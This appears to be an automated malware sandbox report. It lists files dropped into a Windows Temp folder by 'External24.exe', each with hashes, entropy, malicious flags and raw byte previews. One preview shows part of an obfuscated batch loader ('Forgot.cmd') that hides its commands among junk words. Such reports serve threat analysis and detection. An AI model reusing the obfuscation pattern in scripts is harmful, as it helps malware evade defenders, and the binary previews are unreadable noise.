Preview:	d...''N^r......r..J.\.....~.;..u......V.#...s`..m..M......[vAa..-.gZ...-..d......1r."d#.....c.S..g..M..j]./..u#..JE.%7.00... H.....J........3!.Y.SvsO.........w.[22:.o.n.....V>].lK#.Dc6m....T....yQ.....yx}6...s....I...y.h.F.C..q..... .^.Q....6.Xi.!.%H?[+uK.O......@d .,.......;.).w.b. ..6.7....?...k.]...4...'$:]nZ.[..`.............+#2.P7..6r.........%..r.=6l.e.B1M.~.u.ct...c....8.1..ga.O!k~m.....N9.t)..H^n.-J....HB.8..V...1.[&Jx.RB....q5.;..6v1@.tr2..B.r.]e...~...aW..?.!7....%.y....A.......}z.=C.....c...gC../$.$...._.+../?.@....x....x;.K.i.\.....:.[.\|e.S..Y..d...E.+)..i.....ie+n.2...j...X...$.5.$....^X.ka$Om..!..wk....F.W5w..@b..y..#....pv...>..x5....N..z..{N..u..$.T.2b..}..Fp..-z~.L.el.....x....../...2..#@e.....5.......h.3.`............GH..HL....I.....*..D.7..j]!)....RHB....=}I.......9\c........sf$..m..........Z2e^>.<.... ...ruy....J..M%..o~N....'....M.>..8h-.s...u...&...5.......K.K..bA.L.&o.~......~.V.......W......_Y.\ouGY.....J.....).H

C:\Users\user\AppData\Local\Temp\Annex

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	StarOffice Gallery theme \354V\213\361W3\377\307\0060eK, 1183409670 objects, 1st \204\202
Category:	dropped
Size (bytes):	54272
Entropy (8bit):	6.5832527631511315
Encrypted:	false
SSDEEP:	768:zN15pMIlIkHlay5sxcj1qeGiReINDpWPIDJ0vLyktlgwYtfKUGabl8UvrcyzJsv:rRlyxcZqvinN8PsJitgXKUvl8UTcyzJy
MD5:	A5D18667A79D8C963BB32315EFE47E14
SHA1:	7EA214C082C66C5AF02F02819E6A5DEB2CCE1A7B
SHA-256:	65B9C9E5C04CCE99E2A4EF9BEBE6178A007EE21094C9EB83C7E587F5F809DBE7
SHA-512:	2A65B40C78CF0A7619C82ABC49FF2930391F75DE9DDD43A59CC77CB60F1626D4ABF118254FEB53BEC756DEB6BAC69D2933EC996AB4213C0FB36D0869F1CBFE3D
Malicious:	false
Preview:	..U..V..W3...0eK..N..F......~....j....Y..t..u....x......~..._.F.....^]...V......V.....Y..^...V.....V....Y..^...V..N...0eK...t.Q......N...t.Q......N.....V...Y..^...U..E....P..P.I.]...U..M...t-.}..u'.}..u!.E..x..u.j.Zf...@..@.H...@.A.3.....@..]...U..V.u...tQ.}..uK.}..uE.}..u?.M......f..f.A.f...A....t.Ht.Ht..A....q...x.I....A....A..F.3....W...^]...U..E...t.. .3....W...]...U..j.h.;I..u..!........t.j.h.;I..u...........t...@....V.u.V...P..E..03.^]...U..V.u..F.P..L.I...u...t.Q......3.^].......t...Q.P..U..QQ..u.hW..........e..VWj.^.}.WRQ.P8..y.........{.E..U..e..RP...Q..U...xH..tR.B(...t...u8..J@f;.u..R<.M......U.........t....t.Ht.....j...j...j.^..t..E.RP...QL.M...t...Q.R._f..^..].U..3..}.....j....H........P.....U..QSV.u...E...W..t.......PS..8.I.....x5..t=.e...E.P.u...4.I...x(.u.S..4.I...t..&..u...,.I....u.S..0.I....._^[..].U.....E.SVW..3.3...P..U...Rh....SQ.]..P....E...........u...@........]..U..RP.Q............U.z(........B6@.......E.RP...QL.E..U.Rj.P...Q ...E.y...@..

C:\Users\user\AppData\Local\Temp\Anytime

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	101376
Entropy (8bit):	7.998252782619019
Encrypted:	true
SSDEEP:	3072:SdoUSHu4n3EMLCKsq87cO0Nl7/SLk9o3Q9:mFu0bKsXIO0DSLk9AQ9
MD5:	3AC46A4FFC849E4A10C2FC13CE82C5EE
SHA1:	546790F7221144238C520BB884BDE5EE21A2D140
SHA-256:	AD20A4B3890F44EB9783D4DAF7584C2B82530B3E80CC034B394494ECAEE237A0
SHA-512:	3E3D3299A72FD59249F248A32BAAAA335848F5AEEDA1418562802B0DC30E7530841AEE3E0A83B3BB938B1445E8F519F3335D65EA8105566247FEFDE3B6541E17
Malicious:	true
Preview:	.%..].$.o.Dl...\...l..-...7~.O.;R.T[.w.uhT.C.C.AY`A....v.x.......:.D.6......4...u.i.d..Sw.h..;..k?.J.[.N,A...$y.x..(....&.nG I..A.Og$K.w.<..o..d..+...).n../.4.7...e@....c.Lm<'B#..;N...N.l..+.G..?...h0g.}.0.......B..a.VM\....7.......?.Iz/.rs[..t/c....>,...GK..#.." .n:......=Ns..c.Y......)...t....\|.J....C..._....=..6..k....?.8....y.]...#..E.g...XC}..'..z....f ..e7......Y..nvq..T.-.o(.^.z...k..pW..Uw....uc.B.....Y/2}..G.NY.l.......[.-..Y..N?X6........sI.@3.e.V...)....)...Jl5...~]..`.0Kb1,.G0\|......G.f..Mf&.Lk?c^.)....Sxn.1.Ea.'C..=/.i?....6.7:.Icn.....{.h.....>...W#...{..p2.>.Z<...a..Q%.S....f......-O.....\w..w3./2..S..=I....F.\|....o.h.s]{{.+.........Z.W..e..(..@i.-S.6..=....E(..B.6.h..%eN...5.oZ..S...:...s..xD.8....:..EH...'.J......!...(..ot..&.%....)....7..^O.......%H............;..cV.:.{2.[._.....0.A....&..V......z$S...D.Q.7..5*.SN=.pZo...%.,L<....W.....ui.3p.}.......3........3=....$..4..H.C3...'.i..Y....swvR.wv.S.D.K....#..$cw\...

C:\Users\user\AppData\Local\Temp\Appearance

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	81920
Entropy (8bit):	7.998027167213825
Encrypted:	true
SSDEEP:	1536:Blqq2mFFAR2Gso6pSN/Rp95sw1DNFxFi4/n1xLUBfC1+:Blx/HqvJN/T/XFxMenDsfC1+
MD5:	84B5D4546A34814D20C065FBA3905807
SHA1:	0984799EBCD122E427BCBFECB1B5271A528F07FF
SHA-256:	0B1B18C307D9E22227604DF6445300FFACB15A3B09E233552B6D09747DCF40FE
SHA-512:	E877928E060FD0BBD7E2B26FF730565317459F890C506B81050139165249571114CE502101EA6D9328DFF25DDB2B35EA03F21A6193497D8284E7602988743F4B
Malicious:	true
Preview:	ab2&....B.."...X...103.s..^.Y......z-.=s\|.a...l.\|)......%?6.W.... M..0[b...#...p.mP.4....}:'...-....~b"y.@X$"M..WT.D..[px:?.)m..[.R.;.).."......(..M.o......,.....~EY(....3j..'..].b\|.I...F.....G\.PO.....^>).3+..h.R.......{..6P&..3..L.I.-.......}$.a>...^.X;K.W..(.`.)&.41.h.Z...n1<>....Q.w.9.\..9....qH.._..}0E.#)....V...`......O.{k$L..u.Y.sb..@S. t.....i.?y.]S.$V5.}onDX.s)...R.......z.S.&.U....m.u:.....I.K......d...-..;.XR..>.!..K...-.......9m..(....8Y.....c.^...m.vG..z=4.?.....E.3 ../..@d%..HU..B.!........n.~.Phh.....:.~.....Q...5.`.k......"..S'.cIOZ...?..]...e4.g.......&V~W..`c.)..H../f...a...!.>F..`.J....>...I.......@Q....s.z..2.$TDy30..;-An........"9..1.#.}.......02&m.[...L...z............z0....Mo....K..L........M...S.`.....n.....r. ...I..l09.C.0..K...yV..7...+.+.lSQ...d.#...}.......M.D.....@.f.....o..^..P.Kpa..l.d...&.i...:.k^/<t.A.A.?.Y.....9.3...)..At.hNE..=...Iq..4.t:.;.[.tN..t..Afi...!~4Q2....4.......wtI.lf.....`......i..

C:\Users\user\AppData\Local\Temp\Army

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	118784
Entropy (8bit):	7.998280168871854
Encrypted:	true
SSDEEP:	3072:YnOrLEivzCaeUANvVyDismeeKpE0oY2HDhLo5VoUL++u:hrgibXazgilxKVoLHDV8oUL7u
MD5:	7168D546A6AE15D56AB11D3DF4F227F8
SHA1:	9E897B1F1D4BBCAB4D8760FB6CF6CF953345A9A4
SHA-256:	CE761C9C98171EDE9265299183D5F0477D068F169F67567E811284C1298F3C01
SHA-512:	EEA4132BB6538DCCC45DA7023DB5E01A2881F2F57DC33B3980091B75E3366DF6A04F778163DA57102DFA97870A5DF3F7E12122B5E26694CCC8C19B46356C3C75
Malicious:	true
Preview:	..y..?."}.qL...f.q../.....&.Y,P3.`..f..3e.M....D./=.....\N2OX...MF..I..3.O<x.[.v...Q..+&..p@...Hj..F0.^.`....&s...C<......rJ....^..Mw...YqV9.n5.#...n}.].......[X...X.....n`..k.C..a....G............P[r2.h}%u...!....'..^.,G.;.~`s]..L..N.Mz.S.,..,J..p:01.....T~.u.Fy.S.ef_..pmf..-.y..@.P....(&U..C_m....?%9.K.....D..(...H.......slY.,.0F.U...=.x".>'...s.yU:.....Z..n.....z..+..3...R.'..!...7.j....Y...n1.q...q{..^.....}q#.c.U...[.......X..A..xX9].M#...#.....Q....;.UD.n.s\|........\|...`.......f......'..KG.@.\|..mC....Y..s.v...le....h.<..bD.+.j.iU.c..{.E..n.hE....b.2~....s....@.EGA.$Y0,..>zp_....y....F.....fNQ9v....h...6.c.h....P.A.y..VW\|+..3#.<..g.p...=z!L...Vi.D....p...;.4....i..?.[..`...P.....yi.[65......".x.b\|..U........$._.jjQOd..g.;.^.u."..&.Fi..1_.#....N..U....."C[+.....i...G.y..#...C...0.........I......X.8X....is.;..5.k...W.%..w./....?..@...a.."../'.l\|L..Q.....G....2.<....{.L..!?.ra_.......7ex..d.:.eNn.H.&.).+....;..+."...bZA...E..p.0.G...

C:\Users\user\AppData\Local\Temp\Asia

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	6.51237091740838
Encrypted:	false
SSDEEP:	768:cHh17McqQHEdQ7iwDIUKo+jBAfe6TtgguvkFec+jJ5PZvimdFiFGbKZof:QkdIlDbKffUCJ5h3Fsof
MD5:	2148C3F408EE6B1311E3B522C844F69D
SHA1:	EF2B763E0C66A446822EC702243689E2C188702C
SHA-256:	1C97598821C6A70368D13E9C4546C47D9FB59109C314A60FF8D4101A02C70737
SHA-512:	92B2AD3A8B562F8C236B52924BE35A1DC5EA3284765E7E49FF777D0ABED0F1BD2B7CBD8351F2012AA72F50C927AAEFC6FA38E319B8C35A1B9030CEBA989B14B4
Malicious:	false
Preview:	]...U...u..u.j......]...U...u..u.j......]...U...u..u.j......]...U...u..u.j.....]...U...u..u.j.....]...U...u..u.j.....]...U..E..M.VQ.@....lS..P......u....t...P...E..F...........P...&..F.....3.^]...U..E.VW.@...."S..P.j....u......P...>3._.F.....^]...U....QSV.u.W....^...t..F.....R.......v..N..I...R.....u.P..j..D$.PW.T....\|$.........t..M.V..R..V.....Y...u...."P...F......>_^3.[..]...U.. .......SV.u.3.W3.M..E..~....v..F..H..IR....E....v..F..H..4R.............R.U.f.......N.R.U.R.1.U.I.R.U.RSP..R..P....Q..P.....u.u....{O...U.3..&.G.~.j...W.H....p........M.3.G;.u.......P..Q..........6I..S..WV.F...M.E..e..j.WPV.M..}..$E......M...O...E.e..W.E..E.WPV.}...E......M...N.....uJ.E..e..j..E..E.WPV.}...D......M..N...E.e..j..E..E.WPV.}..D......M..N.._^3.[..]...U...4.E.SV3.@.W...]..p...~..u.3.@.E..E.P..}.....j.X.E...M...N....E.A..E..A..E.A..M.E......E.A..E..A..E.A..E....E...t.....M.E.......E...t..M.......E..P.S....u'.u.....M...F.........Sj..H.....o......R.H....~...Sj..H.

C:\Users\user\AppData\Local\Temp\Camp

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	5890
Entropy (8bit):	7.419547292191225
Encrypted:	false
SSDEEP:	96:wd75V2niDMqTgBxe1Ht3Ijv4pxIxChhmG7Qf9KjXl0ip4rV2D+1:etVkUTgBxe1HCjv4pdhhmGj7l0ieJ2Q
MD5:	2B6842ED089C780B04EC63A4913C01BC
SHA1:	FCC2FA4E4A3FE82A8F1D2D62C70544BF5F800D0B
SHA-256:	061523D676409A44F05464AA6CF32C62654B1037C33DD71C4417AF58B9F8B146
SHA-512:	173B6AA48DC200C98BB7F188DD624613B9B8DBADD11A8D0D5DF5EE4CD612F89CD0C688D5F00C8B5D87D65BC8621ADBC424800236658D4CCB5A92C7D81E5C9AB2
Malicious:	false
Preview:	.0L..+.....7....>0<0...+.....7...0..........0!0...+.........{6..B..X.C.'.LX.>......0...0................/N.R.0....H........0W1.0...U....BE1.0...U....GlobalSign nv-sa1.0...U....Root CA1.0...U....GlobalSign Root CA0...110413100000Z..280128120000Z0R1.0...U....BE1.0...U....GlobalSign nv-sa1(0&..U....GlobalSign Timestamping CA - G20.."0....H.............0..........e..W..S.4.....G.j..[..'.4.........Anf....dZF/...w..\.".jg...t.O..R.[.G.....e>..0Erm9..6....O....1.a..b.@..................Yxw...RkP.)....e.`a"...2..Q....0...........l.z....b'_o.m8t.......L...}J&..V....S.t...h.`.. .....t..).b.G...S....;.p~.%........0..0...U...........0...U.......0.......0...U......F.>.........j....0G..U. .@0>0<..U. .0402..+........&https://www.globalsign.com/repository/03..U...,00(.&.$."http://crl.globalsign.net/root.crl0...U.#..0...`{f.E...P/}..4....K0....H.............N^V..F..I1..9(.....A.....o.....@..U..?. v.4...U:........P...{R:.......x\.K...:$....X...0..^.1...H..p.:^V..=........

C:\Users\user\AppData\Local\Temp\Cincinnati

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	169984
Entropy (8bit):	7.998997552571149
Encrypted:	true
SSDEEP:	3072:3TyEKPGNleoaYe+l26DAdod3KoR51EEbMkXDwF899JG2F5v2aM7LNJJtXdd:jfKON0zYe426t3KodrgkXDv9JziX7r
MD5:	92B1A7C76EEB1EF9A42229412D7F9CBD
SHA1:	ABF1A8289A5BD75AC4817471A6C539A379EEDA71
SHA-256:	C20923426F2C6FF01FA3146FA33B22FA5B083DE23A6ED279415225737B72B433
SHA-512:	320FE0495E38F36610485929F28F09BB95A0D62642EF66FCF40BC0A58D5757892C7268EB7F93BE48F1A1CEE47E9A97A2FF695302D05C4C85E4712CE041500C2C
Malicious:	true
Preview:	#...=..6.0CUDk$C........&.$).PN.....=H.C.h..}."..Q.W@?....hKo..k..1...........a..>0dau.g...F....T:..m.=~B-.v..O..Y...l..TJq..<....3?.U....n.8.)>..H4v..h~RK<E.0z.O.9h.3..VBh..Z.ws....n.g.>........W....8MA....8';.....l2....})..u..1.E.2...B.....<..S....q/P.}........`..7C..k..I...../...(......o}p..$...'....eD.6..g...M.F.=.....-..>..E...0H..>..!.n..mx.&..kQ..V..r.;-nC....Q..b......j.R...z.~.)..0\....".I..E.h..........H...=].0..3HnW.......eog.....%.e....iz..dgD.....I:.C..Ij~.;E.b.3.LI.qf3...}(.d.bA>....x...6....X..3a[....M<../.N...e>.....f..m..3......F/..B..HLg.Y....K.[.6.. .....y.....[.EHjn-.e')K...^.Twm....d........N.;.K4...p\....O..........%C..8.eg....x.).e.T...M..H...b...WCt3.Kd..6..$5.z..tk.j....]~...@..w..q.`.4....z+zL.....1arM.(jTj.4\.f.....@..CG....*p.q.._P.=e$[.e.S.F....y.F.........J...\|...........n.H?[.4..'.?.......N.[)..T..te@~..Y..-.(.\|\.%..J8>.....I.p2../......a...V..`.u.4.[.s...!.5D%.Ox.B9.[..D....5...6..a..e...d'X.%.^ ...e

C:\Users\user\AppData\Local\Temp\Coated

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	53248
Entropy (8bit):	6.7629921692466874
Encrypted:	false
SSDEEP:	1536:giB27MlRHq6EQU7uLQT6unj5ctpYuYtWGJe:jM7MlRKecTF5c2pc
MD5:	3705ED69B8EF3ACFA5114F76081EDE86
SHA1:	2AA5D837D9D90B9BA7185E27B0B0F787CD94B9BF
SHA-256:	CF965971F7E3C524C2284AFBF03DCFC33711E54D8A4307D305D3C1059E7E3C20
SHA-512:	D83FCA5CA3888EFD1DB0E09994DD77AE05AA48131FB8465920BB5662C7BB3A6974FEF266AA26C8E80D657F6AABA462722D621777794B7E1D81DF88BA495B81C8
Malicious:	false
Preview:	..}.j.[.E.U.;........2...t[;.tW....tQ..u.V....I..U...t<..............4..IL..u.....E...F.j.h.....F.P.........F..U..M.G.}.E.@.E....U.....IL..=.QL.....IL......;.s$f.A.......Y..a$.f.A%...Y8.Y4..@.M...F.u.M......j.[3..}...............5.IL..u.>.t.9.t...F....F......F....u.j.X...G........P..d.I..E...tL..tHP....I...t=.M..%.......u...F..@.....u...F....F.j.h.....F.P.........F.....F..@.F....@bL...t.....X.G.=....]......3......j......Y.j.h..K..n...3.].u....u..P......}.....................;5.QL........................IL...D8....u....... ..jV.....Y.e......IL..D8..t..u..u.V.^.......................... .....}..E.............(.u..}.V.Y...Y.................J...........U.......?...P.K.3.E...D.....E..M.V3...8...W3...0.....@...9u.u.3........u......!0.[...................................(...S....IL...$....\.$.......t....u+.E....u.....!0....................8....D.. t.j.j.j.P.p>.......8........Y....P.....(.....$.......IL..D.....2....!...3.@l9...........P..(........<.....$.......

C:\Users\user\AppData\Local\Temp\Concerning

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	67584
Entropy (8bit):	4.532168722575368
Encrypted:	false
SSDEEP:	768:tbAGWrT+UTcL4qHq25NKEHq9BxyyM0Dj2Bmgari0U:tbO3TcvNHq9Bxhgari
MD5:	514ECA84651A46730A91E6F16DB7FD49
SHA1:	53B3468399120411CEB8DC459CEBF3DE218B9D08
SHA-256:	00EFA211A3BC940E30BA76B87FFD1E8E758ADEFA014F9BE387CA1842698B33A5
SHA-512:	866BC44783E54028AB8A0A4B9C8DE391C1ABB5E48EA808B95FDDABF56629EC6F7E7F6D129DBE69BCA8590B789D6E3113E1E909832AF89E7593CD3B6CF4D0F3EF
Malicious:	false
Preview:	m.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.p.p.p.!.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m...............................................................................................................................................................................m.m.m.m.m.m.m.m.m.....................................m.m.m.m.m.m.m.m.m.m.m.m.m.m...........................................................................................................................................................................m...............................................................................................................................................m.....m.m...m.m.....m.m.........m.........................m...m...............m.............................................................................................

C:\Users\user\AppData\Local\Temp\Cow

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	6.840906522308143
Encrypted:	false
SSDEEP:	768:zxrUCVoyOQ5DuOKHnPiamE9w97OUg4eVDqp8F:zxrnVRCOa69E9wFOUg/Rqp8F
MD5:	DA2FF29F62C557944153E5F15902ABF3
SHA1:	20292BD52BFFFD140BA9DF72E586D11E2AF06976
SHA-256:	FF01F7EE006A3EC5CD2F8FA250F6B29A293D7DE0BE076C4E607085FBD3DC26ED
SHA-512:	624E5F1A8F661A4DBCE0164CDC21041D32B61EFE0F0B5A178DACE767B700C17DE33727F69D01C9A29E24FCC76EB539A7AC7107D3EE87001EDE7F83E6FD3C80E6
Malicious:	false
Preview:	P..w@..c1..Q'.h?!.N=0.ZWU.....................TTT.................qqq...xxx.........^ZW.S;'.pD"..N$..Y-..m<...S...h..s..s...h...T..n=..Y-..N$.iB".K9+.\YW.................qqq.............^^^\|....zzz.............P=..lC!.zL$..V)..a1..n>...Q...f...q...q...g...S..p?..a1..V).xL$.dA".I<1.}}}.................SSSz........ppp....}}}.........GA<.$...,...0...>)...W,.R:!.=...E6%.H:).H:).E6%.A1..<+..8&..4"..0...,...$...HEB.................ooo.....fff:................poo.777.FFF.---.+++.110.?..===.===.+++.+++.+++.+++.+++.+++.+++.+++.+++.---.CCC.333.ppo.................III9```.................MGB.KKK.................""".NNN.................................................AAA.NJG.................VVV.ggg.................VA1.2...eee.....................}}}.........................................lll.0 ..K?4.................ccc.ooo................dE,..P.%...................\|\|\|.(...............................................wK(.S>..................nnn.vvv.................sM-..W..e?!...............

C:\Users\user\AppData\Local\Temp\Delivering

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	21504
Entropy (8bit):	4.499072840165251
Encrypted:	false
SSDEEP:	384:QhJhFTqUF2zCTWy1x1ab5lbTHVi5GwUvc7vjie1EHH4NkOSFrDS62EBrodtW7OB7:QhdqgWWwr2G+jvEHHzR3Sh7Wscs
MD5:	B60A11F0AF39E6E69BEF027A38FA4B81
SHA1:	27B7E228A24AD6330E24173A42F5B120BDCFE407
SHA-256:	35C980C68033DB20E65CDE3570DFC4FD4613BB31CA2EE4BB31EFED61CB91A624
SHA-512:	39191DDCADD0407036E4AE2CEBF9DE3D1F87DAC1B9B67BCCE1DB16B7CB1B45798274B0574325196B846D06B57412CBB062C28DD1234898102AE0AECB04F6F31F
Malicious:	false
Preview:	.E.........j}Yf9.u....E....8_..^[..]......f;.t.j0Y3.f;.r0j9[f;.w.k........j0........Yf;.s.]...x.........;.}..E........U..E.V3..@....2.....F.. r.^].U..E.V3..@....2...F.. r.^].U..QQS.].V..U..u..C.W....Cx.<H..y.....i....}....3....{P.........W.E.;...@....C\|.E......;...............%....=....u....#....#...................%....=....u....#....#..............E.......}....00K.........E0eJ.;.t-...$?J...;.t ....#?J.....RJ...;...&......;.u.;}........E..>...j.X.z..~o+.J;s\|s....7....E.=....w..C<.]......]..].......w..C<....9M...............%..~!.[\|J;.s.f.....f.....f;...........+u....._^[..].U..Q.E..M.S..VW..xS;E.}N...E..t..+4...u....P..<dJ...Y..u.j..+.M...6P.E......HQW.. ...M....3.f..w..9..j.X_^[..].+.V....f..u.f9.t...2...f;.t.f;.^.....E.....3.^.U..E.VW..t.+...4.H..:.R.f;.u...u.3._^]......E......U..SVWj..._+..}..t?f.......f#.....f;.u.+......#.=....u...F......#.#................;.u....t=...t.3..M.M.3.B...&...t%v.3.B...v.......t.......;.w.E.......3.;u.v.f.~..t..z..E..8.B._^[].U....S..3

C:\Users\user\AppData\Local\Temp\Desperate

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	6.8087494035400615
Encrypted:	false
SSDEEP:	768:5NK1dvq6LqgaHbdMNkNDUySdK8M4INduPbOUGM4INduPbOU:YvtmgMbFuyO1MBNfMBNG
MD5:	B87CCA5A9F5B7387784C2734BF5F8CC9
SHA1:	34711DFAA1585EF4CD557C52C93B6D96C3CCF7BB
SHA-256:	08B8C2AB911D0380672726EE96A4031F4CF5149E30204288986AE087AC20CDB7
SHA-512:	6155EE09936F9EAB6921F22BC40C7584C9A2C0116ACA30C7090888390E2ACDF84B4253AACFCBCCCF6A88709582B05E7535C29012C3A22274907ABE12B4370491
Malicious:	false
Preview:	i.o.n. .c.a.l.l...........R.6.0.2.6.....-. .n.o.t. .e.n.o.u.g.h. .s.p.a.c.e. .f.o.r. .s.t.d.i.o. .i.n.i.t.i.a.l.i.z.a.t.i.o.n.............R.6.0.2.7.....-. .n.o.t. .e.n.o.u.g.h. .s.p.a.c.e. .f.o.r. .l.o.w.i.o. .i.n.i.t.i.a.l.i.z.a.t.i.o.n.............R.6.0.2.8.....-. .u.n.a.b.l.e. .t.o. .i.n.i.t.i.a.l.i.z.e. .h.e.a.p.........R.6.0.3.0.....-. .C.R.T. .n.o.t. .i.n.i.t.i.a.l.i.z.e.d.............R.6.0.3.1.....-. .A.t.t.e.m.p.t. .t.o. .i.n.i.t.i.a.l.i.z.e. .t.h.e. .C.R.T. .m.o.r.e. .t.h.a.n. .o.n.c.e.....T.h.i.s. .i.n.d.i.c.a.t.e.s. .a. .b.u.g. .i.n. .y.o.u.r. .a.p.p.l.i.c.a.t.i.o.n...........R.6.0.3.2.....-. .n.o.t. .e.n.o.u.g.h. .s.p.a.c.e. .f.o.r. .l.o.c.a.l.e. .i.n.f.o.r.m.a.t.i.o.n.........R.6.0.3.3.....-. .A.t.t.e.m.p.t. .t.o. .u.s.e. .M.S.I.L. .c.o.d.e. .f.r.o.m. .t.h.i.s. .a.s.s.e.m.b.l.y. .d.u.r.i.n.g. .n.a.t.i.v.e. .c.o.d.e. .i.n.i.t.i.a.l.i.z.a.t.i.o.n...T.h.i.s. .i.n.d.i.c.a.t.e.s. .a. .b.u.g. .i.n. .y.o.u.r. .a.p.p.l.i.c.a.t.i.o.n... .I.t. .i.s. .m.o.s.t. .l.i.k.e.l.y. .t.h.e. .

C:\Users\user\AppData\Local\Temp\Forgot

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	ASCII text, with very long lines (972), with CRLF line terminators
Category:	dropped
Size (bytes):	16229
Entropy (8bit):	5.076397449246337
Encrypted:	false
SSDEEP:	384:LSOV5XU+iYy02s/JD+dPgnM15UQZwanMronBP91brSSwn5K:LL5XUBtCiInM15UYAoBPbbrbwn5K
MD5:	2651BFEA5F2D6420A6788A9983650D24
SHA1:	043B9A78F5D6833AF83780C87FFAE5BDF7C3ADAA
SHA-256:	80FA56ADCBA18FDE6C438DCA2E6906DFCDF82C971566F4CA83F1204C9D0138CE
SHA-512:	3AB2E950CD56ACE5FFA7D563ED8BD7F3E6446C4B53B478C9A23082FBF05475315975AF0F80C6F07CC180BE30452793BF1C98348A5A7EC7609760F834F82D4C05
Malicious:	false
Preview:	Set Xanax=Q..IqPreserve Ht Watts Seeking Miniature Blowing Cassette Gregory Prepare ..KyasAlabama Satisfied Green ..MdVariables Fundamental ..zVlQAthletes Reliability Indices ..EdktToronto Jack Blond Library ..Set Asked=g..tDoYResources Flash Doctor ..BmFSConnector Uses ..zVXManuals Requirement Tom Shipments Professionals Warm ..glHRacing Actors Emerging Failure Ampland Stunning Alerts Episodes Govt ..ueOdds Dc Defendant Quarterly Lp Loves Cement Central ..gCQhNavigator Schemes ..ZnTESports Thee Suburban Tomorrow Purchase Fighter Noon Mic ..cKrInvestor Receipt ..Set Portuguese=E..AMwMLeft Sandy Project Hunting Litigation Ian Communications ..pjMFilme Strain Operated Sitemap ..CiOuConcerning Walker ..egSellers Fork Stationery ..yiauTools ..ufLegislature Signatures Installed Balloon Girl Sociology Brook ..KlUXGenerally Nations Refined Episodes Interstate Cialis ..SQxTCop Land La ..UbqmOld Games Left Architecture ..Set Plugins=C..WHWedding Chapters Leaves Welfare Mag Downtown ..GYzPotato

C:\Users\user\AppData\Local\Temp\Forgot.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (972), with CRLF line terminators
Category:	dropped
Size (bytes):	16229
Entropy (8bit):	5.076397449246337
Encrypted:	false
SSDEEP:	384:LSOV5XU+iYy02s/JD+dPgnM15UQZwanMronBP91brSSwn5K:LL5XUBtCiInM15UYAoBPbbrbwn5K
MD5:	2651BFEA5F2D6420A6788A9983650D24
SHA1:	043B9A78F5D6833AF83780C87FFAE5BDF7C3ADAA
SHA-256:	80FA56ADCBA18FDE6C438DCA2E6906DFCDF82C971566F4CA83F1204C9D0138CE
SHA-512:	3AB2E950CD56ACE5FFA7D563ED8BD7F3E6446C4B53B478C9A23082FBF05475315975AF0F80C6F07CC180BE30452793BF1C98348A5A7EC7609760F834F82D4C05
Malicious:	false
Preview:	Set Xanax=Q..IqPreserve Ht Watts Seeking Miniature Blowing Cassette Gregory Prepare ..KyasAlabama Satisfied Green ..MdVariables Fundamental ..zVlQAthletes Reliability Indices ..EdktToronto Jack Blond Library ..Set Asked=g..tDoYResources Flash Doctor ..BmFSConnector Uses ..zVXManuals Requirement Tom Shipments Professionals Warm ..glHRacing Actors Emerging Failure Ampland Stunning Alerts Episodes Govt ..ueOdds Dc Defendant Quarterly Lp Loves Cement Central ..gCQhNavigator Schemes ..ZnTESports Thee Suburban Tomorrow Purchase Fighter Noon Mic ..cKrInvestor Receipt ..Set Portuguese=E..AMwMLeft Sandy Project Hunting Litigation Ian Communications ..pjMFilme Strain Operated Sitemap ..CiOuConcerning Walker ..egSellers Fork Stationery ..yiauTools ..ufLegislature Signatures Installed Balloon Girl Sociology Brook ..KlUXGenerally Nations Refined Episodes Interstate Cialis ..SQxTCop Land La ..UbqmOld Games Left Architecture ..Set Plugins=C..WHWedding Chapters Leaves Welfare Mag Downtown ..GYzPotato

C:\Users\user\AppData\Local\Temp\Helena

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	29427
Entropy (8bit):	7.99326270641812
Encrypted:	true
SSDEEP:	768:64k8A8duCxa8r+sNRiK4z2gSftOsn2p6qVD7WrY:6h8fJrzSSVn2UW5
MD5:	9F58CA43967A4A8ABF330142A4BEF668
SHA1:	D86C1FBC58B2D1CC425AF007D1C9D57769DCC677
SHA-256:	D1A572FF092CEF5B43B8FD01FA101C24A5CE7F3E82AF4D1908CC2056CB7B6EE8
SHA-512:	5C39C9E23AC711398C041DBFE68A433116803CCA4BDD931B6ED6A0534D2C769B0F300DD83F5D2C0AFE9E5AA7982E33FB5C6ADE373369A61AC37E101D88503E9C
Malicious:	true
